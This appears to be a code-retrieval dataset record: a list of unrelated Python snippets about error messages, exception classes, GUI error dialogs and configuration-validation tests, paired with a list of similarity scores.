[ "def set_invalidated(self):\n # GTK Settings for evogtk\n self.set_property('image',self.__errorimg)", "def init_load_working_config(self):\n try:\n self.currentconfig = remgeom.load(mustexist=True)\n except remgeom.RemGeomError:\n QtWidgets.QMessageBox.information(self, \"No working config\", \"No working config, you may want to create one\");\n return\n self.set_title()\n self.redisp_config()\n self.updateUI()", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def on_init_fail(self, event_time, message):\n pass", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def _raise_settings_not_found():\n result = click.ClickException(\n 'there is no settings file. 
Use `pulp-smash settings create` to '\n 'create one.'\n )\n result.exit_code = -1\n raise result", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = \"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def after_init(self) -> None:\n if self.options.format.lower() != \"default_notebook\":\n self.error_format = self.options.format\n if not hasattr(self, \"color\"):\n self.color = True", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def __init__(self, init_val):\n self.err_fig_num = init_val\n self.disp_fig_num = init_val", "def test_missing_tags_settings(self, settings):\n def _error(*args, **kwargs):\n raise AttributeError\n\n settings.MADCAP_FLARE_ROOT = 'https://www.example.com/'\n error = MagicMock()\n error.side_effect = _error\n settings.MADCAP_FLARE_TAGS.__get__ = error\n\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n {'help_key': 'test-flare'})", "def test_missing_root_setting(self, settings):\n def _error(*args, **kwargs):\n raise AttributeError\n\n error = MagicMock()\n error.side_effect = _error\n\n settings.MADCAP_FLARE_ROOT.__get__ = error\n\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n {'help_key': 'test-flare'})", "def initGUI(self):\n\n\t\t# Set window's title\n\t\tself.parent.title(\"Error Message\")\n\t\t# Creat frames that contain messages and buttons \n\t\tself.buttonFrame = Frame(self.parent)\n\t\tself.buttonFrame.pack(fill = BOTH, expand = True)\n\t\tmessageFrame = Frame(self.buttonFrame, borderwidth = 1)\n\t\tmessageFrame.pack(fill = BOTH, expand = True)\n\t\t# Creat buttons\n\t\tself.makeButtons()\n\t\t# Create and show an error message as an label\n\t\tvar = StringVar()\n\t\tlabel = Message(messageFrame, textvariable=var, relief=RAISED, width = 1000)\n\t\tvar.set(self.message)\n\t\tlabel.pack(fill = BOTH, expand = True)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def test_parameter_group_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n mock_grnam.side_effect = KeyError()\n self.configuration.hgst_space_group = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_group = 'Fred!`'\n self.assertRaises(exception.VolumeDriverException,\n 
self.driver.check_for_setup_error)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def initDefaults(self):\n return _libsbml.GeneralGlyph_initDefaults(self)", "def has_error(self, has_error):\n\n self._has_error = has_error", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def test_init__invalid_notification_center_fails(self):\n\n class InvalidNotificationCenter:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"notification_center\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(notification_center=InvalidNotificationCenter())", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def test_incorrect_init(self):\n with self.assertRaises(MissingMarkersException) as context:\n self.subject()", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with pytest.raises(AttributeError):\n knxipframe.init(23)\n\n with pytest.raises(CouldNotParseKNXIP):\n # this is not yet implemented in xknx\n knxipframe.init(KNXIPServiceType.SEARCH_REQUEST_EXTENDED)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def _plot_init(self):\n pass", "def _plot_init(self):\n pass", "def test_parameter_redundancy_invalid(self, mock_ghn, mock_grnam,\n mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n self.configuration.hgst_redundancy = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_redundancy = 'Fred'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def check_for_setup_error(self):\n super(RBDISCSIDriver, self).check_for_setup_error()\n\n required_options = ['rbd_iscsi_api_user',\n 'rbd_iscsi_api_password',\n 'rbd_iscsi_api_url',\n 'rbd_iscsi_target_iqn']\n\n for attr in required_options:\n val = getattr(self.configuration, attr)\n if not val:\n raise exception.InvalidConfigurationValue(option=attr,\n value=val)", "def __init__(self, raise_error: Optional[bool] = False):\n self.raise_error = raise_error", "def test_parameter_mode_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n self.configuration.hgst_space_mode = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_mode = 'Fred'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def 
missingvalue(message):\n raise jinja2.UndefinedError(message)", "def error_recovery_settings(self, error_recovery_settings):\n\n self._error_recovery_settings = error_recovery_settings", "def initialize(pelicanobj):\n pelicanobj.settings.setdefault(\"LIBRAVATAR_MISSING\", None)\n pelicanobj.settings.setdefault(\"LIBRAVATAR_SIZE\", None)", "def reset_error_state(self):\n self.error_state = Error.none\n self.error_info = ''", "def test_settings_error():\n cb = MagicMock()\n\n with pytest.raises(ValueError):\n kuber.cli(cb, arguments=[\"render\", \"--settings=foo\"])\n\n cb.assert_not_called()", "def display_error(self, message):\n self.ui_widget.display_error(message=message)", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def test_error_initialisation_from_xdmf_missing_label():\n with pytest.raises(ValueError, match=r\"label\"):\n festim.InitialCondition(value=\"my_file.xdmf\", label=None, time_step=1)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def test_setup_with_invalid_config(self):\n setup_component(self.hass, \"sensor\", INVALID_CONFIG_MINIMAL)\n self.hass.block_till_done()\n\n state = self.hass.states.get(\"sensor.dark_sky_summary\")\n assert state is None", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def record_global_error(self, error_message):\n self.global_error = error_message", "def _logging_error(self, log_conf, msg):\n QMessageBox.about(\n self, \"Plot error\", \"Error when starting log config [%s]: %s\" % (\n log_conf.name, msg))", "def _check_errors(self, json_loaded):\n\n content = json_loaded\n try:\n m = content[u'error'][u'message']\n c = content[u'error'][u'code']\n out= \"API Error code: {}\\nError message: {}\".format(c, m)\n raise InvalidQueryException(self.name, out)\n except KeyError:\n pass", "def initialize_visualization(self) -> None:\n pass", "def updateMessages(self):\n\n if self.params[1].value:\n if arcpy.Exists(self.params[1].value):\n try:\n arcpy.GetRasterProperties_management(self.params[1].value, \"MINIMUM\")[0]\n except arcpy.ExecuteError:\n self.params[1].setErrorMessage(\n 'No statistics exists for input surface. 
Please use the Calculate Statistics tool first to calculate statistics.')\n\n if self.params[3].enabled == True:\n if not self.params[3].value:\n self.params[3].setErrorMessage(\n 'DEM must be set in case of HAND raster.')", "def test_colors_fail_uncalibrated(self):\n command = ('{0} -b 100 -e {1} {2} {2} {3}').format(\n os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_ev' + HEN_FILE_EXTENSION),\n 3, 5, 10)\n with pytest.raises(ValueError) as excinfo:\n hen.colors.main(command.split())\n\n assert \"No energy information is present \" in str(excinfo.value)", "def __init__(self, message=None, title=\"COMET encountered an Error\", QiD=None):\n from PyQt5 import QtCore, QtWidgets\n\n self.QiD = QiD\n self.message_buffer = []\n self.title = title\n self.message_counter = 0\n self.msg = None\n\n if message: # Only if called directly\n self.message_buffer = message\n self.showdialog()", "def __init__(self, parent, message, image_to_displayed=None):\r\n\r\n self.text_ = message\r\n path_dir = os.path.dirname(os.path.realpath(__file__))\r\n if image_to_displayed == \"warning\":\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/warning.png\")\r\n elif image_to_displayed == 'check':\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/check.png\")\r\n else:\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/error.png\")\r\n\r\n self.image_ = image_\r\n BasicDialog.__init__(self, parent, title=None)", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with self.assertRaises(TypeError):\n knxipframe.init(23)", "def test_openWindowWithWrongSettingsFile(self):\n self.createWrongSettingsFile()\n return self.assertRaises(SettingsCorrupted, ConfigurationWindow)", "def check_for_setup_error(self):\n\n # If configuration is incorrect we will get exception here\n self._rpc_call('bdev_get_bdevs')", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def initDefaults(self):\n return _libsbml.GraphicalObject_initDefaults(self)", "def errorDialog(self, errormessage):\r\n Tk.tkMessageBox.showerror(self, 'Error', errormessage)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is 
illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_required(self, missing_param):\n with mock.patch.dict('os.environ', {\n **REQUIRED_SETTINGS,\n missing_param: '',\n }, clear=True), self.assertRaises(ImproperlyConfigured):\n self.reload_settings()", "def __init__(self, *args):\n this = _libsbml.new_SBMLError(*args)\n try: self.this.append(this)\n except: self.this = this", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def test_setup_with_invalid_language_config(self):\n setup_component(self.hass, \"sensor\", INVALID_CONFIG_LANG)\n self.hass.block_till_done()\n\n state = self.hass.states.get(\"sensor.dark_sky_summary\")\n assert state is None", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def error(self, message=None, show_help=True):", "def init(self, *args, **kwargs):\n try:\n self._init(*args, **kwargs)\n except (ValueError, TypeError, UnicodeError, ConfigParser.Error), exc:\n raise ConfigInvalidError, str(exc), sys.exc_info()[2]", "def testDefaultErrorMessage(self):\n\n json_message = current.xml.json_message\n\n msg = json_message(False)\n msg = json.loads(msg)\n self.assertEqual(len(msg), 2)\n self.assertEqual(msg[\"status\"], \"failed\")\n self.assertEqual(msg[\"statuscode\"], \"404\")", "def _check_initialized(self):\n self.assertEquals(0, self._error_count)\n self.assertEquals(0, len(self._error_messages))", "def test_node_no_config() -> None:\n node = MyNode()\n\n with pytest.raises(LabGraphError) as err:\n node.setup()\n\n assert (\n \"Configuration not set. Call MyNode.configure() to set the configuration.\"\n in str(err.value)\n )", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. 
\"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def test_parameter_user_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n mock_pwnam.side_effect = KeyError()\n self.configuration.hgst_space_user = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_user = 'Fred!`'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def initDefaults(self):\n return _libsbml.TextGlyph_initDefaults(self)", "def test_no_setting(self):\n with self.assertRaises(ImproperlyConfigured):\n import_from_setting('DOES_NOT_EXIST')", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepSample('Not_a_Sample', self.prep_template)", "def _checkfigure(self):\n if ((type(self.figure) is Figure) and\n (type(self.axes) in (Subplot, Axes))):\n return\n else:\n raise HKEPlotterNotInitializedError(self.figure,\n self.axes)", "def error_dialog(self, title, message):\n return self._impl.error_dialog(title, message)", "def test_errorfornoarguments(self):\n Square.reset_objects()\n with self.assertRaises(TypeError) as e:\n s1 = Square()\n self.assertEqual(\n str(e.exception),\n \"__init__() missing 1 required positional argument: 'size'\")" ]
[ "0.5554523", "0.52968895", "0.527939", "0.521656", "0.521091", "0.51314735", "0.50853", "0.5000523", "0.4994115", "0.49844408", "0.49832064", "0.49832064", "0.49832064", "0.49656707", "0.49567476", "0.4927834", "0.49192548", "0.49177274", "0.4886028", "0.48816097", "0.48751745", "0.48666832", "0.4864279", "0.48634765", "0.48530832", "0.48484787", "0.48423904", "0.48396248", "0.48167613", "0.48080808", "0.48043492", "0.47968495", "0.47955602", "0.47850254", "0.47689024", "0.47492442", "0.47481132", "0.47263157", "0.4713673", "0.4712421", "0.4700864", "0.46922937", "0.46908474", "0.46837074", "0.46745348", "0.46745348", "0.46620497", "0.4659958", "0.46594888", "0.46434814", "0.46389335", "0.4637929", "0.4617415", "0.46109605", "0.45993844", "0.4596306", "0.45920077", "0.4591397", "0.45895118", "0.45861307", "0.45805475", "0.45685044", "0.4563012", "0.45599443", "0.4559243", "0.45565322", "0.45513046", "0.45512944", "0.45441264", "0.4543126", "0.45408478", "0.4540518", "0.45358482", "0.45350352", "0.45340306", "0.4533074", "0.4521998", "0.45200777", "0.4518669", "0.45176622", "0.45166972", "0.45160687", "0.45149252", "0.45123214", "0.45077962", "0.45046034", "0.45045924", "0.4501639", "0.45006338", "0.44982412", "0.44938934", "0.4488689", "0.44830662", "0.44813448", "0.44799352", "0.44724447", "0.44692594", "0.44625667", "0.44613254", "0.44603965", "0.44538814" ]
0.0
-1
Initializes MissingGraphicField with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def test_model_custom_field_editing_attribute_missing(self):\n\n try:\n error = False\n\n # GIVEN invalid model field definition\n # WHEN model gets executed in the system\n class TestTestModel(models.Model):\n name = AppModelCharField(max_length=256, blank=True, null=True)\n\n except Exception as e:\n msg = e.args[0]\n error = True\n\n # THEN error should be raised\n self.assertTrue(error)\n\n # AND clear error description is present\n ref_msg = 'Field editing statuses are missing for AppModelCharField; called from TestTestModel'\n self.assertEqual(ref_msg, msg)", "def get_empty_mandatory_value_error(field_name):\n\n\tmessage = (\"No value was given for mandatory field '{0}'\".format(field_name))\n\n\treturn message", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def missing_information(self, info, field):\n raise NoData", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def test_raises_on_missing_needed_fields(self):\n test_name = \"impossible_creature_not_present\"\n self.form.constructor_fields = [*self.form.constructor_fields, test_name]\n message = \"The fields for email, username, and constructor must be set in fields. \"\n self.assertNotIn(test_name, self.form.base_fields)\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def add_required_field_fail(self, field, data):\n message = '{} is required'.format(self.fields[field])\n data = data.copy()\n\n data[field] = ''\n self.add_fail(data, message)\n assert not self.verify_object(data)\n\n del data[field]\n self.add_fail(data, message)\n assert not self.verify_object(data)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def testValidate_Required(self):\n class SimpleMessage(messages.Message):\n required = messages.IntegerField(1, required=True)\n\n simple_message = SimpleMessage()\n self.assertRaises(messages.ValidationError,\n simple_message.check_initialized)\n simple_message.required = 10\n simple_message.check_initialized()", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def test_raise_on_missing_critical(self):\n name_for_field = 'absent_field'\n field_opts = {'names': (name_for_field, 'absent'), 'alt_field': '', 'computed': False}\n critical_fields = {'absent_field': field_opts}\n with self.assertRaises(ImproperlyConfigured):\n self.form.fields_for_critical(critical_fields)", "def testMessageFieldValidate_Initialized(self):\n class MyMessage(messages.Message):\n field1 = messages.IntegerField(1, required=True)\n\n field = messages.MessageField(MyMessage, 10)\n\n # Will 
validate messages where is_initialized() is False.\n message = MyMessage()\n field.validate(message)\n message.field1 = 20\n field.validate(message)", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def __init__(self, msg, path_to_item=None):\n self.path_to_item = path_to_item\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiAttributeError, self).__init__(full_msg)", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def testConstructorNotAField(self):\n class SomeMessage(messages.Message):\n pass\n\n self.assertRaisesWithRegexpMatch(\n AttributeError,\n ('May not assign arbitrary value does_not_exist to message '\n 'SomeMessage'),\n SomeMessage,\n does_not_exist=10)", "def test_raises_on_constructor_fields_error(self):\n self.form.constructor_fields = None\n message = \"Expected a list of field name strings for constructor_fields. 
\"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_missing_required_field_raises_error():\n with pytest.raises(ValidationError):\n Entity()", "def test_model_formfield_doesnt_raise(self):\n try:\n fields_for_model(Color())\n except AttributeError:\n self.fail(\"Raised Attribute Error\")", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "async def test_create_missing_field(self):\n # the \"value\" field is missing\n data = {'id': 'foo'}\n with self.assertRaises(InvalidResourceDetails) as cm:\n await self.resource.create(data)\n self.assertEqual(\n 'Error: \"value\": Required', str(cm.exception))", "def missing(self, value):\n self.MISSING = value", "def test_creation_throws_error_on_missing_fields(self, test_domain):\n with pytest.raises(ValidationError) as err:\n test_domain.repository_for(Person)._dao.create(last_name=\"Doe\")\n\n assert err.value.messages == {\"first_name\": [\"is required\"]}", "def set_invalidated(self):\n # GTK Settings for evogtk\n self.set_property('image',self.__errorimg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def on_init_fail(self, event_time, message):\n pass", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. 
\"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def test_error_initialisation_from_xdmf_missing_label():\n with pytest.raises(ValueError, match=r\"label\"):\n festim.InitialCondition(value=\"my_file.xdmf\", label=None, time_step=1)", "def add_error(self, field, message):\n add_list_value(self.errors, field, message)", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. \"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n 